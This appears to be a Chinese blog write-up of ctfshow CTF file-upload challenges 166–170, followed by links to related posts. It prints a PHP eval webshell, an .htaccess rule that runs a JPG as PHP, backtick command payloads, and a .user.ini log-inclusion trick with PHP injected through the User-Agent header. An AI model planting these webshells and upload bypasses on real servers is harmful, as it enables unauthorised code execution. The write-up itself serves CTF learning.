ctfshow——web入门166~170

最新推荐文章于 2025-05-29 10:17:42 发布
最新推荐文章于 2025-05-29 10:17:42 发布
阅读量435 收藏 5
点赞数 10
文章标签: 前端 android php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/uwvwko/article/details/146461040
版权
web入门166

这题是让我们上传一个zip压缩包,然后可以下载该压缩包,下载时zip文件会进行文件包含,也就是include

首先先随便找一个文件压缩,然后记事本打开写入一句话木马

之后上传文件,点击下载文件时用bp抓包

发送给重发器

(这里如果用get提交的话是不能有空格的,我们可以用+来代替)

web入门167

上传jpg

.htaccess:

.htaccess被称为超文本入口,此文件有多个功能,其中一个功能可以改变文件扩展名,同时也可以实现文件夹密码保护、用户自动重定向、自定义错误页面等功能。

payload:

<FilesMatch "1.jpg">

SetHandler application/x-httpd-php

</FilesMatch>

这个大概意思是1.jpg会被当做php文件执行

接下来我们在1.jpg文件中插入我们的恶意代码

:

<?= eval($_POST[1]);?>

然后再上传1.jpg

接着点击下载文件,复制url(如https://0f5f07f4-02dc-46b0-8a60-69556a9a1d8c.challenge.ctf.show/upload/1.jpg),蚁剑连接

web入门168

png形式

然后我们通过测试发现可以使用`

那么步骤如下:

上传文件抓包,<?=`ls ../`;?>

访问/upload/9.php

然后这次的flag再flagaa.php中

直接和上面一样

<?=`tac ../flagaa.php`?>

访问

web入门169

要求zip

这里我们还是用到.uers.ini

文件内容:auto_prepend_file=/var/log/nginx/access.log

但是:

直接这样发送,发现无法上传,文件类型错误

然后因为accept为image

所以我们还需要将Content-Type改成image/png

成功上传

然后如果我们直接访问。upload,会显示403无php文件,所以我们上传一个php文件

明显是UA,那就直接插入UA头

web入门170

这题和上题一样

上传.user.ini文件

上传php文件

成功访问:

uwvwko
关注
Centos Docker部署教程_docker部署centos
2401_84281655的博客
04-28 967
docker pull ubuntu:后面跟docker hub的版本参数。docker pull ubuntu #自动拉取最新版本ubuntu。大纲路线、讲解视频,并且后续会持续更新**
CTFshow——web入门(信息泄露)
doraemon12345的博客
05-30 1627
web1 源码泄露 直接 f12 在下面注释行中可以看到flag web2 前台js绕过 方法有很多: 1.ctrl+u 查看源代码 2.burp抓包查看 3.在网址前加上view-source:即可查看源代码 web3 协议头信息泄露 题目提示没思路抓包看看,就用burp抓个包看看,在响应头里发现flag web4 robots后台泄露 题目提示:总有人把后台地址写入robots,帮黑阔大佬们引路。 访问robots.txt,得到flag地址/flagishere.txt,访问该地址拿到flag web
ctfshow web165 JPG二次渲染脚本(生成图片马)脚本
10-21
ctfshow web165 JPG二次渲染脚本(生成图片马)脚本
ctfshow-web入门-文件上传(web166web167)&(web168-web170)免杀绕过
Welcome To Myon'Blog !
07-11 1727
查看源码,前端只让传 zip上传 zip 成功后可以进行下载随便搞一个压缩包,使用记事本编辑,在其内容里插入一句话木马:上传该压缩包,上传成功后点击下载文件,使用 burpsuite 抓包:我这里木马内容用的 request ,就在 get 里执行 ls 没什么问题,但是读取 flag 时识别有点问题,最好使用 post 请求,因此将请求方法改为 post ,将 file 的内容还原到上面。
ctfshow web入门 文件上传web162--web167
2301_81040377的博客
04-09 1050
我们上传的文件如果不符合要求,就会被删除,导致成功上传无法访问,没有用。但是如果我们上传的速度比服务器删的速度快,就可以了。#### 本题总结可能你们并不觉得这道题难但是这道题确实难到我了,我做了很久总结一下可能错误的点。一样的操作,如上题,如果代码跑不出来,要么忘记改要么就是没有放包。然后进入下载页面的时候抓包(“下载文件的时候抓包”)压缩文件太大或者太小导致上传不成功或者很难去。,你们可以自己修改,把脚本的也改了就是。访问上传的文件,进行命令执行。只能上传压缩文件,我们就在。里面添加一句话木马就行了。
ctfshow——web入门176~180
uwvwko的博客
04-01 677
表:-1'union/**/select/**/1,2,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()%23。库:-1'union/**/select/**/1,2,database()%23。-1'order/**/by/**/3%23(最后面的'要使用url编码)因为--+中的+是空格的意思,所以是过滤了空格,那我们就用/**/代替。但%0c(换页)可以。
ctfshow——web入门254~258
uwvwko的博客
05-17 1144
结果:O:11:"ctfShowUser":3:{s:8:"username";结果:O:11:"ctfShowUser":3:{s:8:"username";然后我们怎么调用他呢,看到ctfShowUser类中的 __destruct,但是如果照他的源代码,class=new info()简单分析就是传入的username和password的值回去当作login方法的参数,然后只要让他们和类中的值一样就好了。
ctfshow——web入门108~114
uwvwko的博客
02-12 836
v2=abc (构造类)考虑查看目录函数的替代:scandir()、golb()、dirname()、basename()、realpath()、getcwd()file=php://filter/zlib.deflate|zlib.inflate/resource=flag.php。其中 scandir()、golb() 、dirname()、basename()、realpath() 需要给定参数。(详细链接)是 PHP 中的一个类,用于遍历文件系统目录中的文件和子目录,但是需要给他一个路径。
ctfshow——web入门——128~132
uwvwko的博客
02-21 245
x && y 当x为false时,直接跳过,不执行y;x||y 当x为true时,直接跳过,不执行y。成立,所以payload:?在不加转义字符的前提下,前面的点表示任意字符,而“+?ctfshow/is' 后面的i表示大小写匹配,s表示忽略换行符,单行匹配。(因为有call_user_func在我们就不用加括号,f1,f2会被直接调用)_()==gettext() 是gettext()的拓展函数,开启text扩展。
ctfshow——web入门139~146
uwvwko的博客
02-28 809
这里是使用了时间盲注,|管道符将 cat /f149_15_h3r3 的输出作为后面的输入 ,因为flag的格式已知,除了{}由44个字符组成,然后通过对str便利,如果if成立,sleep 3。这里我们用v3=*("%0c%06%0c%0b%05%0d"^"%7f%7f%7f%7f%60%60")("%0c%0c"^"%60%7f")*字符串形式的字母或数字(如 "a", "b123", 等),在 PHP 中,任何以字母开头的字符串在转换为整数时通常会被视为 0。),则认为条件为真,即找到了正确字符。
ctfshow——web入门191~194
uwvwko的博客
04-16 298
用于获取单个字符的 Unicode 码点(code point)。这意味着它接受一个长度为 1 的字符串(即单个字符),并返回该字符对应的整数值。right()返回具有指定长度的字符串的右边部分,用法同上。eft()返回具有指定长度的字符串的左边部分。这里过滤了ascii,我们可以使用ord。逻辑和前几题一样,只不过过滤了ord。我们可以用mid或者lpad。改成ord的形式就可以了。但字母数字都放出来了。
ctfshow——web(总结&持续更新)
qq_55202378的博客
10-31 805
是证书的原因,目前的解决方法是将URL中的https改为http。连用时,数据包中的post字段将会当做php代码执行。后面接着的数据会被当做php代码执行。
CTFshow web入门——文件上传
热门推荐
小元砸的博客
03-14 1万+
Web 151
[ctfshow]web入门——命令执行(web72-web77)
ShenZ的博客
12-02 2729
ctfshow的命令执行(web72-77)
[ctfshow]web入门——文件上传(web156-web163)
ShenZ的博客
03-18 5907
[ctfshow]web入门——文件上传 web156 上传.user.ini web157 web158 web159 web160 上传.user.ini+日志包含 web161 web162 way1:远程文件包含 way2:session条件竞争包含 web163 上传口 试了试upload界面有一个默认文件,可以用上传.user.ini的方法 后台应该是屏蔽了很多字符串(php
国芯思辰| 国产四通道24位生理电采集模拟前端AFE全面替换ADS1294R,心电贴性能再飞跃
最新发布
weixin_38427020的博客
05-29 653
国芯思辰,国产芯片替代
vue组件和插件的区别
u014642921的博客
05-28 497
只要有install方法并且接受Vue构造函数作为参数,就能够被Vue.use使用。可以是第三方库,也可以是自己编写的组件。
el-table-column如何获取行数据的值
LoveYouQueena的博客
05-29 618
一旦你获取到了当前行的数据,就可以根据需要进行后续的操作或展示,比如删除、编辑当前行的数据等。的模板中定义一个按钮,并为该按钮添加一个点击事件处理器。在Vue 2.x中,你可以使用。属性(在Vue 3.x中)来获取当前行的数据。点击事件处理器会接收到一个参数(在Vue 2.x中是。如果你使用的是Vue 3.x,代码将略有不同,主要是将。中获取当前行的数据,并通过点击事件处理器进行后续操作。在Vue 3.x中,则使用。),该参数包含了当前行的数据。属性(在Vue 2.x中)或者。,在Vue 3.x中也是。
ctfshow-web入门
01-19
### CTFShow Web 入门教程与资源 #### 图片中的隐藏后门代码 在处理CTF挑战时,有时会遇到图片中嵌入的恶意代码或后门。这类攻击通常利用图像文件格式的特点,在不影响视觉效果的前提下植入可执行代码。为了检测此类漏洞,可以使用工具如Wireshark抓包分析网络传输数据,或者通过十六进制编辑器(例如010 Editor)查看二进制内容[^1]。 ```bash # 使用010Editor打开可疑图片文件并查找异常字符序列 $ 010editor image.png ``` #### 构造命令执行Payload 对于存在命令注入风险的应用程序,可以通过精心设计输入参数来触发特定行为。比如在一个假设场景下,如果服务器端未对用户提交的数据做充分验证,则可能允许攻击者绕过安全机制执行任意指令。下面展示了如何构建用于测试目的的有效载荷: ```php <?php // 测试用PHP代码片段模拟远程命令执行 $c = $_GET['c']; exec($c, $output); echo implode("\n", $output); ?> ``` 实际操作时应谨慎对待任何涉及系统调用的功能,并确保只针对授权环境开展实验性活动[^2]。 #### PHP随机数生成函数反向工程 某些情况下,了解目标应用内部工作原理有助于找到解决方案路径。以PHP为例,其内置伪随机数发生器`mt_rand()`依赖于初始状态——即种子值。当知道部分输出结果时,可通过逆向工程技术恢复原始种子,进而预测后续产生的数值系列。开源项目提供了实现这一过程所需的算法和编译方法[^3]。 ```cpp #include "php_mt_seed.h" int main() { // 示例:基于已知MT输出还原种子 unsigned long mt_output[] = { /* 已知的一组连续输出 */ }; int seed; find_mt_seed(mt_output, sizeof(mt_output)/sizeof(*mt_output), &seed); printf("Recovered Seed: %d\n", seed); return 0; } ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值